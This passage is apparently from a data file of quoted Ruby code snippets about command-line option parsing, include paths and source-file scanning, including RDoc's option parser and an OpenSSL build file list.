nil\n end\n\n argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT']\n\n opts.parse! argv\n\n @files = argv.dup\n\n @rdoc_include << \".\" if @rdoc_include.empty?\n\n if @exclude.empty? then\n @exclude = nil\n else\n @exclude = Regexp.new(@exclude.join(\"|\"))\n end\n\n check_files\n\n # If no template was specified, use the default template for the output\n # formatter\n\n @template ||= @generator_name\n\n rescue OptionParser::InvalidArgument, OptionParser::InvalidOption => e\n puts opts\n puts\n puts e\n exit 1\n end",
"def includedirs\n res = []\n @flags.each { |f| res.push f if f =~ /^-I/ }\n res.join \" \"\n end",
"def append_header_search_path(target, *paths)\n setting = 'HEADER_SEARCH_PATHS'\n target.build_configurations.each do |config|\n config.build_settings[setting] ||= '$(inherited)'\n paths.each do |path|\n config.build_settings[setting] << ' '\n config.build_settings[setting] << path\n end\n end\nend",
"def include_path\n @include_paths.map { |p| \"-I#{ p }\" }.join( \" \" )\n end",
"def scanHeaderFile file_param\n\n\tif file_param == nil then return end\n\n\tno_ending = file_param.split(\".\")\n\t$Objects.push(no_ending[0])\n\tf = File.open(file_param,\"r\").each_line { |line| \n\n\t\tline.scan(/^#include \"(.+)\"$/) do |w|\n\t\t\t$files_to_do.push(w)\n\t\tend\n\t}\n\n\t$files_to_do.flatten!\n\t$Objects.each do |word|\n\t\t$files_to_do.reject! {|repeat| repeat.split(\".\")[0] == word}\n\tend\n\n\tif $files_to_do != nil then\n\t\t$files_to_do.uniq!\n\t\tscanHeaderFile $files_to_do.pop\n\tend\nend",
"def getArguments\n\n\t# Parse the arguments\n\ttheArgs = { :clang => false,\n\t\t\t\t:rewrite => false,\n\t\t\t\t:help => false,\n\t\t\t\t:paths => [],\n\t\t\t\t:exclude => [] }\n\n\ttheParser = OptionParser.new do |opts|\n\t\topts.banner = \"Usage:\\n rn-format [--help] [--clang] [--rewrite] [--exclude=PATH] PATH [PATH...]\";\n\t\topts.separator \"\";\n\t\topts.separator \"Reformat any source files within the supplied paths,\";\n\t\topts.separator \"displaying the results to standard output.\";\n\t\topts.separator \"\";\n\t\topts.separator \"Options:\";\n\n\t\topts.on('--clang',\t\t\t\t\t\t'Show raw clang-format output') do\n\t\t\ttheArgs[:clang] = true;\n\t\tend\n\n\t\topts.on('--rewrite',\t\t\t\t\t'Rewrite files in-place') do\n\t\t\ttheArgs[:rewrite] = true;\n\t\tend\n\n\t\topts.on('--exclude=PATH',\t\t\t\t'Exclude a path') do |thePath|\n\t\t\ttheArgs[:exclude] << File.expand_path(thePath);\n\t\tend\n\n\t\topts.on('--help',\t\t\t\t\t\t'Show the help') do\n\t\t\ttheArgs[:help] = true;\n\t\tend\n\tend\n\n\ttheParser.parse!;\n\ttheArgs[:paths] = ARGV;\n\n\n\n\t# Show the help\n\tif (theArgs[:help] || theArgs[:paths].empty?)\n\t\tputs theParser.help();\n\t\texit(false);\n\tend\n\t\n\treturn theArgs;\n\nend",
"def main\n arg_parser=GetoptLong.new\n arg_parser.set_options(\n [\"-e\", \"--exclude\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-i\", \"--include\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-h\", \"--headers\", GetoptLong::NO_ARGUMENT],\n [\"-u\", \"--usage\", GetoptLong::NO_ARGUMENT])\n\n arg_parser.each do |opt, arg|\n begin\n case opt\n when \"-u\"\n usage()\n exit(0);\n when \"-h\"\n printHeader\n when \"-i\"\n $includes.push(arg)\n when \"-e\"\n $excludes.push(arg)\n end\n rescue => err; puts err; break;\n end\n end\n\n # after all args if we still don't have a directory then show usage\n if (ARGV.length != 1)\n usage();\n end\n\n # convert strings to regexs once, rather than during filtering loop\n $excludes.collect! {|str| Regexp.new(str)}\n $includes.collect! {|str| Regexp.new(str)}\n\n processTags(getFiles(ARGV.shift))\n return\nend",
"def parse_files(options)\n \n file_info = []\n\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true)\n\n file_list.each do |fn|\n $stderr.printf(\"\\n%35s: \", File.basename(fn)) unless options.quiet\n \n content = File.open(fn, \"r\") {|f| f.read}\n\n top_level = TopLevel.new(fn)\n parser = ParserFactory.parser_for(top_level, fn, content, options, @stats)\n file_info << parser.scan\n @stats.num_files += 1\n end\n\n file_info\n end",
"def include_options\n { include: parsed_associations || [], methods: parsed_methods || [] }\n end",
"def parse(args)\n @options = {}\n @options[:command] = :scan # Default command is to scan for lints\n\n OptionParser.new do |parser|\n parser.banner = \"Usage: #{@application.executable_name} [options] [file1, file2, ...]\"\n\n add_linter_options parser\n add_file_options parser\n add_misc_options parser\n add_info_options parser\n end.parse!(args)\n\n # Any remaining arguments are assumed to be files that should be linted\n @options[:included_paths] = args\n\n @options\n rescue OptionParser::InvalidOption => ex\n raise InvalidCliOptionError,\n \"#{ex.message}\\nRun `#{@application.executable_name} --help` to \" \\\n 'see a list of available options.'\n end",
"def do_includes\n @content.scan(/rb_include_module\\s*\\(\\s*(\\w+?),\\s*(\\w+?)\\s*\\)/) do |c,m|\n next unless cls = @classes[c]\n m = @known_classes[m] || m\n\n comment = new_comment '', @top_level, :c\n incl = cls.add_include RDoc::Include.new(m, comment)\n incl.record_location @top_level\n end\n end",
"def definition_file_paths=(_arg0); end",
"def setup_options\n @parser.banner = BANNER\n\n @parser.on('-V', '--version', 'display version and exit') { show_version }\n @parser.on('-h', '--help', 'display help and exit') { show_help }\n @parser.on('-f', '--files=[file1.txt file2.txt ...]', Array, 'text files to read') { |o| @options.files = o }\n @parser.on('-n', '--number=NUM', Integer, 'number of results to show [default = 100]') do |n|\n @options.number = n\n end\n @parser.on('-v', '--verbose', 'verbose output') { @options.verbose = true }\n end",
"def header_files(target_name, &filter)\n target = target(target_name)\n\n header_files = target.headers_build_phase.files\n header_files = header_files.select(&filter) unless filter.nil?\n\n header_paths = header_files.map { |pathname|\n relative_path(pathname)\n }\n\n header_paths\n end",
"def find\r\n scanner = DirectoryScanner.new\r\n scanner.setBasedir(@context.root)\r\n scanner.setCaseSensitive(false)\r\n scanner.setIncludes(@includes.to_java :String) unless @includes.empty?\r\n scanner.setExcludes(@excludes.to_java :String) unless @excludes.empty?\r\n scanner.scan\r\n scanner.included_files.collect{|f| @context.filepath_from_root(f) }\r\n end",
"def set_include # separate function for readability since there are many files\n # @include = %w{ aes asn1 bf bio bn buffer camellia cast\n # cmac cms comp conf db des dh dsa\n # dso ec ecdh ecdsa engine err evp hmac\n # idea krb5 lhash md4 md5 mdc2 modes objects\n # ocsp pem pkcs12 pkcs7 pqueue rand rc2 rc4\n # ripemd rsa seed sha srp stack txt_db ts\n # ui whrlpool x509 x509v3 } # directories\n \n @include = %w{ crypto engines include }\n\n # set of files in libcrypto; since this set has a large number of elements, we\n # accumulate it in per-subdirectory increments\n #\n f_base = %w{ cryptlib cversion cpt_err\n ebcdic ex_data fips_ers\n mem mem_dbg o_time\n o_str o_dir o_fips\n o_init uid x86_64cpuid }\n\n f_objects = %w{ obj_dat obj_err obj_lib obj_xref o_names }\n\n f_md4 = %w{ md4_dgst md4_one }\n\n f_md5 = %w{ md5_dgst md5_one md5-x86_64 }\n\n f_sha = %w{ sha_dgst sha1dgst sha_one sha1_one\n sha256 sha512 sha1-x86_64 sha256-x86_64 sha512-x86_64 }\n\n f_mdc2 = %w{ mdc2dgst mdc2_one }\n\n f_hmac = %w{ hmac hm_ameth hm_pmeth }\n\n f_ripemd = %w{ rmd_dgst rmd_one }\n\n f_whrlpool = %w{ wp_dgst wp-x86_64 }\n\n f_des = %w{ set_key ecb_enc cbc_enc ecb3_enc cfb64enc\n cfb64ede cfb_enc ofb64ede enc_read enc_writ\n ofb64enc ofb_enc str2key pcbc_enc qud_cksm\n rand_key des_enc fcrypt_b fcrypt xcbc_enc\n rpc_enc cbc_cksm ede_cbcm_enc des_old des_old2\n read2pwd }\n\n f_aes = %w{ aes-x86_64 aes_cfb aes_ctr aes_ecb\n aes_ige aes_misc aes_ofb aes_wrap\n aesni-sha1-x86_64 aesni-x86_64 bsaes-x86_64 vpaes-x86_64 }\n\n f_rc2 = %w{ rc2_ecb rc2_skey rc2_cbc rc2cfb64 rc2ofb64 }\n\n f_rc4 = %w{ rc4-x86_64 rc4-md5-x86_64 rc4_utl }\n\n f_idea = %w{ i_cbc i_cfb64 i_ofb64 i_ecb i_skey }\n\n f_bf = %w{ bf_skey bf_ecb bf_enc bf_cfb64 bf_ofb64 }\n\n f_cast = %w{ c_skey c_ecb c_enc c_cfb64 c_ofb64 }\n\n f_camellia = %w{ cmll_ecb cmll_ofb cmll_cfb cmll_ctr cmll_utl\n cmll-x86_64 cmll_misc }\n\n f_seed = %w{ seed seed_ecb seed_cbc seed_cfb seed_ofb }\n\n f_modes = %w{ cbc128 ctr128 cts128 cfb128 ofb128 gcm128\n ccm128 xts128 ghash-x86_64 }\n\n f_bn = %w{ bn_add bn_blind bn_const bn_ctx\n bn_depr bn_div bn_err bn_exp\n bn_exp2 bn_gcd bn_gf2m bn_kron\n bn_lib bn_mod bn_mont bn_mpi\n bn_mul bn_nist bn_prime bn_print\n bn_rand bn_recp bn_shift bn_sqr\n bn_sqrt bn_word bn_x931p modexp512-x86_64\n x86_64-gcc x86_64-gf2m x86_64-mont x86_64-mont5 }\n\n f_ec = %w{ ec2_mult ec2_smpl ec_ameth ec_asn1\n ec_check ec_curve ec_cvt ec_err\n ec_key ec_lib ec_mult ec_pmeth\n ec_print eck_prn ecp_mont ecp_nist\n ecp_nistp224 ecp_nistp256 ecp_nistp521 ecp_nistputil\n ecp_oct ec2_oct ec_oct ecp_smpl }\n\n f_rsa = %w{ rsa_eay rsa_gen rsa_lib rsa_sign\n rsa_saos rsa_err rsa_pk1 rsa_ssl\n rsa_none rsa_oaep rsa_chk rsa_null\n rsa_pss rsa_x931 rsa_asn1 rsa_depr\n rsa_ameth rsa_prn rsa_pmeth rsa_crpt }\n\n f_dsa = %w{ dsa_gen dsa_key dsa_lib dsa_asn1\n dsa_vrf dsa_sign dsa_err dsa_ossl\n dsa_depr dsa_ameth dsa_pmeth dsa_prn }\n\n f_ecdsa = %w{ ecs_lib ecs_asn1 ecs_ossl ecs_sign ecs_vrf ecs_err }\n\n f_dh = %w{ dh_asn1 dh_gen dh_key dh_lib dh_check\n dh_err dh_depr dh_ameth dh_pmeth dh_prn }\n\n f_ecdh = %w{ ech_lib ech_ossl ech_key ech_err }\n\n f_dso = %w{ dso_dl dso_dlfcn dso_err dso_lib\n dso_null dso_openssl dso_win32 dso_vms\n dso_beos }\n\n f_engine = %w{ eng_err eng_lib eng_list eng_init\n eng_ctrl eng_table eng_pkey eng_fat\n eng_all tb_rsa tb_dsa tb_ecdsa\n tb_dh tb_ecdh tb_rand tb_store\n tb_cipher tb_digest tb_pkmeth tb_asnmth\n eng_openssl eng_cnf eng_dyn eng_cryptodev\n eng_rsax eng_rdrand }\n\n f_buffer = %w{ buffer buf_str 
buf_err }\n\n f_bio = %w{ bio_lib bio_cb bio_err bss_mem bss_null\n bss_fd bss_file bss_sock bss_conn bf_null\n bf_buff b_print b_dump b_sock bss_acpt\n bf_nbio bss_log bss_bio bss_dgram }\n\n f_stack = %w{ stack }\n\n f_lhash = %w{ lhash lh_stats }\n\n f_rand = %w{ md_rand randfile rand_lib rand_err\n rand_egd rand_win rand_unix rand_os2 rand_nw }\n\n f_err = %w{ err err_all err_prn }\n\n f_evp = %w{ encode digest evp_enc evp_key evp_acnf\n e_des e_bf e_idea e_des3 e_camellia\n e_rc4 e_aes names e_seed e_xcbc_d\n e_rc2 e_cast e_rc5 m_null m_md2\n m_md4 m_md5 m_sha m_sha1 m_wp\n m_dss m_dss1 m_mdc2 m_ripemd m_ecdsa\n p_open p_seal p_sign p_verify p_lib\n p_enc p_dec bio_md bio_b64 bio_enc\n evp_err e_null c_all c_allc c_alld\n evp_lib bio_ok evp_pkey evp_pbe p5_crpt\n p5_crpt2 e_old pmeth_lib pmeth_fn pmeth_gn\n m_sigver evp_fips e_aes_cbc_hmac_sha1 e_rc4_hmac_md5 }\n\n f_asn1 = %w{ a_object a_bitstr a_utctm a_gentm\n a_time a_int a_octet a_print\n a_type a_set a_dup a_d2i_fp\n a_i2d_fp a_enum a_utf8 a_sign\n a_digest a_verify a_mbstr a_strex\n x_algor x_val x_pubkey x_sig\n x_req x_attrib x_bignum x_long\n x_name x_x509 x_x509a x_crl\n x_info x_spki nsseq x_nx509\n d2i_pu d2i_pr i2d_pu i2d_pr\n t_req t_x509 t_x509a t_crl\n t_pkey t_spki t_bitst tasn_new\n tasn_fre tasn_enc tasn_dec tasn_utl\n tasn_typ tasn_prn ameth_lib f_int\n f_string n_pkey f_enum x_pkey\n a_bool x_exten bio_asn1 bio_ndef\n asn_mime asn1_gen asn1_par asn1_lib\n asn1_err a_bytes a_strnid evp_asn1\n asn_pack p5_pbe p5_pbev2 p8_pkey\n asn_moid }\n\n f_pem = %w{ pem_sign pem_seal pem_info pem_lib pem_all\n pem_err pem_x509 pem_xaux pem_oth pem_pk8\n pem_pkey pvkfmt }\n\n f_x509 = %w{ x509_def x509_d2 x509_r2x x509_cmp x509_obj\n x509_req x509spki x509_vfy x509_set x509cset\n x509rset x509_err x509name x509_v3 x509_ext\n x509_att x509type x509_lu x_all x509_txt\n x509_trs by_file by_dir x509_vpm }\n\n f_x509v3 = %w{ v3_bcons v3_bitst v3_conf v3_extku\n v3_ia5 v3_lib v3_prn v3_utl\n v3err v3_genn v3_alt v3_skey\n v3_akey v3_pku v3_int v3_enum\n v3_sxnet v3_cpols v3_crld v3_purp\n v3_info v3_ocsp v3_akeya v3_pmaps\n v3_pcons v3_ncons v3_pcia v3_pci\n pcy_cache pcy_node pcy_data pcy_map\n pcy_tree pcy_lib v3_asid v3_addr }\n\n f_conf = %w{ conf_err conf_lib conf_api conf_def\n conf_mod conf_mall conf_sap }\n\n f_txt_db = %w{ txt_db }\n\n f_pkcs7 = %w{ pk7_asn1 pk7_lib pkcs7err pk7_doit\n pk7_smime pk7_attr pk7_mime bio_pk7 }\n\n f_pkcs12 = %w{ p12_add p12_asn p12_attr p12_crpt\n p12_crt p12_decr p12_init p12_key\n p12_kiss p12_mutl p12_utl p12_npas\n pk12err p12_p8d p12_p8e }\n\n f_comp = %w{ comp_lib comp_err c_rle c_zlib }\n\n f_ocsp = %w{ ocsp_asn ocsp_ext ocsp_ht ocsp_lib ocsp_cl\n ocsp_srv ocsp_prn ocsp_vfy ocsp_err }\n\n f_ui = %w{ ui_err ui_lib ui_openssl ui_util ui_compat }\n\n f_krb5 = %w{ krb5_asn }\n\n f_cms = %w{ cms_lib cms_asn1 cms_att cms_io\n cms_smime cms_err cms_sd cms_dd\n cms_cd cms_env cms_enc cms_ess cms_pwri }\n\n f_pqueue = %w{ pqueue }\n\n f_ts = %w{ ts_err ts_req_utils ts_req_print ts_rsp_utils\n ts_rsp_print ts_rsp_sign ts_rsp_verify ts_verify_ctx\n ts_lib ts_conf ts_asn1 }\n\n f_srp = %w{ srp_lib srp_vfy }\n\n f_cmac = %w{ cmac cm_ameth cm_pmeth }\n\n # files in 'engines' linked in to libcrypt.a for static build but each is an\n # independent shared library for dynamic build\n #\n f_eng = %w{ e_4758cca e_aep e_atalla e_cswift e_gmp e_chil\n e_nuron e_sureware e_ubsec e_padlock e_capi }\n\n # files in engines/ccgost linked in to libcrypt.a for static build but are linked\n # into libgost.so for 
dynamic build\n #\n @f_ccgost = %w{ e_gost_err gost2001_keyx gost2001 gost89\n gost94_keyx gost_ameth gost_asn1 gost_crypt\n gost_ctl gost_eng gosthash gost_keywrap\n gost_md gost_params gost_pmeth gost_sign }\n\n f_engines = if :static == @build.link_type\n @f_ccgost + f_eng\n else\n f_eng\n end\n\n # concatenate all lists together, checking for duplicates\n all = [f_objects, f_md4, f_md5, f_sha, f_mdc2,\n f_hmac, f_ripemd, f_whrlpool, f_des, f_aes,\n f_rc2, f_rc4, f_idea, f_bf, f_cast,\n f_camellia, f_seed, f_modes, f_bn, f_ec,\n f_rsa, f_dsa, f_ecdsa, f_dh, f_ecdh,\n f_dso, f_engine, f_buffer, f_bio, f_stack,\n f_lhash, f_rand, f_err, f_evp, f_asn1,\n f_pem, f_x509, f_x509v3, f_conf, f_txt_db,\n f_pkcs7, f_pkcs12, f_comp, f_ocsp, f_ui,\n f_krb5, f_cms, f_pqueue, f_ts, f_srp,\n f_cmac, f_engines]\n @f_crypto = all.inject( f_base ){ |m, v| m += v }\n\n # check for duplicates\n cnt = @f_crypto.size\n @f_crypto.uniq!\n cnt -= @f_crypto.size\n raise \"Duplicates in @f_crypto: %d\" % cnt if cnt > 0\n\n end",
"def parse_arguments\n options = {}\n parser = OptionParser.new do |opts|\n opts.on(\"-d\", \"--dir DIR\", \"absolute or relative path of the directory\") do |arg|\n options[:dir] = arg\n end\n\n opts.on(\"-p\", \"--pattern PATTERN\", \"search pattern - can contain asterisk(*) as wildcard\") do |arg|\n options[:pattern] = arg\n end\n end\n parser.parse!\n [options, parser]\nend",
"def include(*args)\n options = Hash === args.last ? args.pop : nil\n files = to_artifacts(args)\n raise 'AchiveTask.include() values should not include nil' if files.include? nil\n\n if options.nil? || options.empty?\n @includes.include *files.flatten\n elsif options[:path]\n sans_path = options.reject { |k,v| k == :path }\n path(options[:path]).include *files + [sans_path]\n elsif options[:as]\n raise 'You can only use the :as option in combination with the :path option' unless options.size == 1\n raise 'You can only use one file with the :as option' unless files.size == 1\n include_as files.first.to_s, options[:as]\n elsif options[:from]\n raise 'You can only use the :from option in combination with the :path option' unless options.size == 1\n raise 'You cannot use the :from option with file names' unless files.empty?\n fail 'AchiveTask.include() :from value should not be nil' if [options[:from]].flatten.include? nil\n [options[:from]].flatten.each { |path| include_as path.to_s, '.' }\n elsif options[:merge]\n raise 'You can only use the :merge option in combination with the :path option' unless options.size == 1\n files.each { |file| merge file }\n else\n raise \"Unrecognized option #{options.keys.join(', ')}\"\n end\n self\n end",
"def parse_files(options)\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true)\n\n return [] if file_list.empty?\n\n file_info = []\n width = file_list.map { |name| name.length }.max + 1\n\n file_list.each do |fn|\n $stderr.printf(\"\\n%*s: \", width, fn) unless options.quiet\n\n content = if RUBY_VERSION >= '1.9' then\n File.open(fn, \"r:ascii-8bit\") { |f| f.read }\n else\n File.read fn\n end\n\n if /coding:\\s*(\\S+)/ =~ content[/\\A(?:.*\\n){0,2}/]\n if enc = Encoding.find($1)\n content.force_encoding(enc)\n end\n end\n\n top_level = TopLevel.new(fn)\n parser = ParserFactory.parser_for(top_level, fn, content, options, @stats)\n file_info << parser.scan\n @stats.num_files += 1\n end\n\n file_info\n end",
"def process_arguments\n @args << \"-h\" if(@args.length < 1)\n \n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE','use the following local file') {|file| @options.file = File.expand_path(file)}\n opts.on('-p','--parse PARSE',\"sets which set of sider files to download #{@@sections.join(\"|\")}\") {|parse| @options.parse = parse}\n opts.on('-d','--download','download the file to be parsed') {@options.download = true}\n opts.on('-o','--output DIR','set the output directory') {|directory| @options.output = File.expand_path(directory)}\n opts.on('-h','--help',\"prints the help\"){puts opts; exit!}\n end\n \n opts_parse.parse!(@args) rescue raise \"There was an error processing command line arguments use -h to see help\"\n end",
"def parse(header_file, to_file)\n includes = @includes.flatten.uniq.map {|i| \"-I#{i.chomp}\"}.join(\" \").chomp\n flags = @flags.flatten.join(\" \").chomp\n cmd = \"#{@exe} #{includes} #{flags} #{header_file} -fxml=#{to_file}\"\n raise \"Error executing gccxml command line: #{cmd}\" unless system(cmd)\n end",
"def cpp_files\n source_files(CPP_EXTENSIONS)\n end",
"def parse argv\n ignore_invalid = true\n\n argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT']\n\n opts = OptionParser.new do |opt|\n @option_parser = opt\n opt.program_name = File.basename $0\n opt.version = RDoc::VERSION\n opt.release = nil\n opt.summary_indent = ' ' * 4\n opt.banner = <<-EOF\nUsage: #{opt.program_name} [options] [names...]\n\n Files are parsed, and the information they contain collected, before any\n output is produced. This allows cross references between all files to be\n resolved. If a name is a directory, it is traversed. If no names are\n specified, all Ruby files in the current directory (and subdirectories) are\n processed.\n\n How RDoc generates output depends on the output formatter being used, and on\n the options you give.\n\n Options can be specified via the RDOCOPT environment variable, which\n functions similar to the RUBYOPT environment variable for ruby.\n\n $ export RDOCOPT=\"--show-hash\"\n\n will make rdoc show hashes in method links by default. Command-line options\n always will override those in RDOCOPT.\n\n Available formatters:\n\n#{generator_descriptions}\n\n RDoc understands the following file formats:\n\n EOF\n\n parsers = Hash.new { |h,parser| h[parser] = [] }\n\n RDoc::Parser.parsers.each do |regexp, parser|\n parsers[parser.name.sub('RDoc::Parser::', '')] << regexp.source\n end\n\n parsers.sort.each do |parser, regexp|\n opt.banner += \" - #{parser}: #{regexp.join ', '}\\n\"\n end\n opt.banner += \" - TomDoc: Only in ruby files\\n\"\n\n opt.banner += \"\\n The following options are deprecated:\\n\\n\"\n\n name_length = DEPRECATED.keys.sort_by { |k| k.length }.last.length\n\n DEPRECATED.sort_by { |k,| k }.each do |name, reason|\n opt.banner += \" %*1$2$s %3$s\\n\" % [-name_length, name, reason]\n end\n\n opt.accept Template do |template|\n template_dir = template_dir_for template\n\n unless template_dir then\n $stderr.puts \"could not find template #{template}\"\n nil\n else\n [template, template_dir]\n end\n end\n\n opt.accept Directory do |directory|\n directory = File.expand_path directory\n\n raise OptionParser::InvalidArgument unless File.directory? directory\n\n directory\n end\n\n opt.accept Path do |path|\n path = File.expand_path path\n\n raise OptionParser::InvalidArgument unless File.exist? path\n\n path\n end\n\n opt.accept PathArray do |paths,|\n paths = if paths then\n paths.split(',').map { |d| d unless d.empty? }\n end\n\n paths.map do |path|\n path = File.expand_path path\n\n raise OptionParser::InvalidArgument unless File.exist? path\n\n path\n end\n end\n\n opt.separator nil\n opt.separator \"Parsing options:\"\n opt.separator nil\n\n opt.on(\"--encoding=ENCODING\", \"-e\", Encoding.list.map { |e| e.name },\n \"Specifies the output encoding. 
All files\",\n \"read will be converted to this encoding.\",\n \"The default encoding is UTF-8.\",\n \"--encoding is preferred over --charset\") do |value|\n @encoding = Encoding.find value\n @charset = @encoding.name # may not be valid value\n end\n\n opt.separator nil\n\n opt.on(\"--locale=NAME\",\n \"Specifies the output locale.\") do |value|\n @locale_name = value\n end\n\n opt.on(\"--locale-data-dir=DIR\",\n \"Specifies the directory where locale data live.\") do |value|\n @locale_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"--all\", \"-a\",\n \"Synonym for --visibility=private.\") do |value|\n @visibility = :private\n end\n\n opt.separator nil\n\n opt.on(\"--exclude=PATTERN\", \"-x\", Regexp,\n \"Do not process files or directories\",\n \"matching PATTERN.\") do |value|\n @exclude << value\n end\n\n opt.separator nil\n\n opt.on(\"--extension=NEW=OLD\", \"-E\",\n \"Treat files ending with .new as if they\",\n \"ended with .old. Using '-E cgi=rb' will\",\n \"cause xxx.cgi to be parsed as a Ruby file.\") do |value|\n new, old = value.split(/=/, 2)\n\n unless new and old then\n raise OptionParser::InvalidArgument, \"Invalid parameter to '-E'\"\n end\n\n unless RDoc::Parser.alias_extension old, new then\n raise OptionParser::InvalidArgument, \"Unknown extension .#{old} to -E\"\n end\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]force-update\", \"-U\",\n \"Forces rdoc to scan all sources even if\",\n \"no files are newer than the flag file.\") do |value|\n @force_update = value\n end\n\n opt.separator nil\n\n opt.on(\"--pipe\", \"-p\",\n \"Convert RDoc on stdin to HTML\") do\n @pipe = true\n end\n\n opt.separator nil\n\n opt.on(\"--tab-width=WIDTH\", \"-w\", Integer,\n \"Set the width of tab characters.\") do |value|\n raise OptionParser::InvalidArgument,\n \"#{value} is an invalid tab width\" if value <= 0\n @tab_width = value\n end\n\n opt.separator nil\n\n opt.on(\"--visibility=VISIBILITY\", \"-V\", RDoc::VISIBILITIES + [:nodoc],\n \"Minimum visibility to document a method.\",\n \"One of 'public', 'protected' (the default),\",\n \"'private' or 'nodoc' (show everything)\") do |value|\n @visibility = value\n end\n\n opt.separator nil\n\n markup_formats = RDoc::Text::MARKUP_FORMAT.keys.sort\n\n opt.on(\"--markup=MARKUP\", markup_formats,\n \"The markup format for the named files.\",\n \"The default is rdoc. Valid values are:\",\n markup_formats.join(', ')) do |value|\n @markup = value\n end\n\n opt.separator nil\n\n opt.on(\"--root=ROOT\", Directory,\n \"Root of the source tree documentation\",\n \"will be generated for. Set this when\",\n \"building documentation outside the\",\n \"source directory. Default is the\",\n \"current directory.\") do |root|\n @root = Pathname(root)\n end\n\n opt.separator nil\n\n opt.on(\"--page-dir=DIR\", Directory,\n \"Directory where guides, your FAQ or\",\n \"other pages not associated with a class\",\n \"live. 
Set this when you don't store\",\n \"such files at your project root.\",\n \"NOTE: Do not use the same file name in\",\n \"the page dir and the root of your project\") do |page_dir|\n @page_dir = page_dir\n end\n\n opt.separator nil\n opt.separator \"Common generator options:\"\n opt.separator nil\n\n opt.on(\"--force-output\", \"-O\",\n \"Forces rdoc to write the output files,\",\n \"even if the output directory exists\",\n \"and does not seem to have been created\",\n \"by rdoc.\") do |value|\n @force_output = value\n end\n\n opt.separator nil\n\n generator_text = @generators.keys.map { |name| \" #{name}\" }.sort\n\n opt.on(\"-f\", \"--fmt=FORMAT\", \"--format=FORMAT\", @generators.keys,\n \"Set the output formatter. One of:\", *generator_text) do |value|\n check_generator\n\n @generator_name = value.downcase\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--include=DIRECTORIES\", \"-i\", PathArray,\n \"Set (or add to) the list of directories to\",\n \"be searched when satisfying :include:\",\n \"requests. Can be used more than once.\") do |value|\n @rdoc_include.concat value.map { |dir| dir.strip }\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]coverage-report=[LEVEL]\", \"--[no-]dcov\", \"-C\", Integer,\n \"Prints a report on undocumented items.\",\n \"Does not generate files.\") do |value|\n value = 0 if value.nil? # Integer converts -C to nil\n\n @coverage_report = value\n @force_update = true if value\n end\n\n opt.separator nil\n\n opt.on(\"--output=DIR\", \"--op\", \"-o\",\n \"Set the output directory.\") do |value|\n @op_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"-d\",\n \"Deprecated --diagram option.\",\n \"Prevents firing debug mode\",\n \"with legacy invocation.\") do |value|\n end\n\n opt.separator nil\n opt.separator 'HTML generator options:'\n opt.separator nil\n\n opt.on(\"--charset=CHARSET\", \"-c\",\n \"Specifies the output HTML character-set.\",\n \"Use --encoding instead of --charset if\",\n \"available.\") do |value|\n @charset = value\n end\n\n opt.separator nil\n\n opt.on(\"--hyperlink-all\", \"-A\",\n \"Generate hyperlinks for all words that\",\n \"correspond to known methods, even if they\",\n \"do not start with '#' or '::' (legacy\",\n \"behavior).\") do |value|\n @hyperlink_all = value\n end\n\n opt.separator nil\n\n opt.on(\"--main=NAME\", \"-m\",\n \"NAME will be the initial page displayed.\") do |value|\n @main_page = value\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]line-numbers\", \"-N\",\n \"Include line numbers in the source code.\",\n \"By default, only the number of the first\",\n \"line is displayed, in a leading comment.\") do |value|\n @line_numbers = value\n end\n\n opt.separator nil\n\n opt.on(\"--show-hash\", \"-H\",\n \"A name of the form #name in a comment is a\",\n \"possible hyperlink to an instance method\",\n \"name. When displayed, the '#' is removed\",\n \"unless this option is specified.\") do |value|\n @show_hash = value\n end\n\n opt.separator nil\n\n opt.on(\"--template=NAME\", \"-T\", Template,\n \"Set the template used when generating\",\n \"output. 
The default depends on the\",\n \"formatter used.\") do |(template, template_dir)|\n @template = template\n @template_dir = template_dir\n end\n\n opt.separator nil\n\n opt.on(\"--template-stylesheets=FILES\", PathArray,\n \"Set (or add to) the list of files to\",\n \"include with the html template.\") do |value|\n @template_stylesheets.concat value\n end\n\n opt.separator nil\n\n opt.on(\"--title=TITLE\", \"-t\",\n \"Set TITLE as the title for HTML output.\") do |value|\n @title = value\n end\n\n opt.separator nil\n\n opt.on(\"--copy-files=PATH\", Path,\n \"Specify a file or directory to copy static\",\n \"files from.\",\n \"If a file is given it will be copied into\",\n \"the output dir. If a directory is given the\",\n \"entire directory will be copied.\",\n \"You can use this multiple times\") do |value|\n @static_path << value\n end\n\n opt.separator nil\n\n opt.on(\"--webcvs=URL\", \"-W\",\n \"Specify a URL for linking to a web frontend\",\n \"to CVS. If the URL contains a '\\%s', the\",\n \"name of the current file will be\",\n \"substituted; if the URL doesn't contain a\",\n \"'\\%s', the filename will be appended to it.\") do |value|\n @webcvs = value\n end\n\n opt.separator nil\n opt.separator \"ri generator options:\"\n opt.separator nil\n\n opt.on(\"--ri\", \"-r\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in the '.rdoc' directory under\",\n \"your home directory unless overridden by a\",\n \"subsequent --op parameter, so no special\",\n \"privileges are needed.\") do |value|\n check_generator\n\n @generator_name = \"ri\"\n @op_dir ||= RDoc::RI::Paths::HOMEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-site\", \"-R\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed.\") do |value|\n check_generator\n\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths.site_dir\n setup_generator\n end\n\n opt.separator nil\n opt.separator \"Generic options:\"\n opt.separator nil\n\n opt.on(\"--write-options\",\n \"Write .rdoc_options to the current\",\n \"directory with the given options. Not all\",\n \"options will be used. See RDoc::Options\",\n \"for details.\") do |value|\n @write_options = true\n end\n\n opt.separator nil\n\n opt.on(\"--[no-]dry-run\",\n \"Don't write any files\") do |value|\n @dry_run = value\n 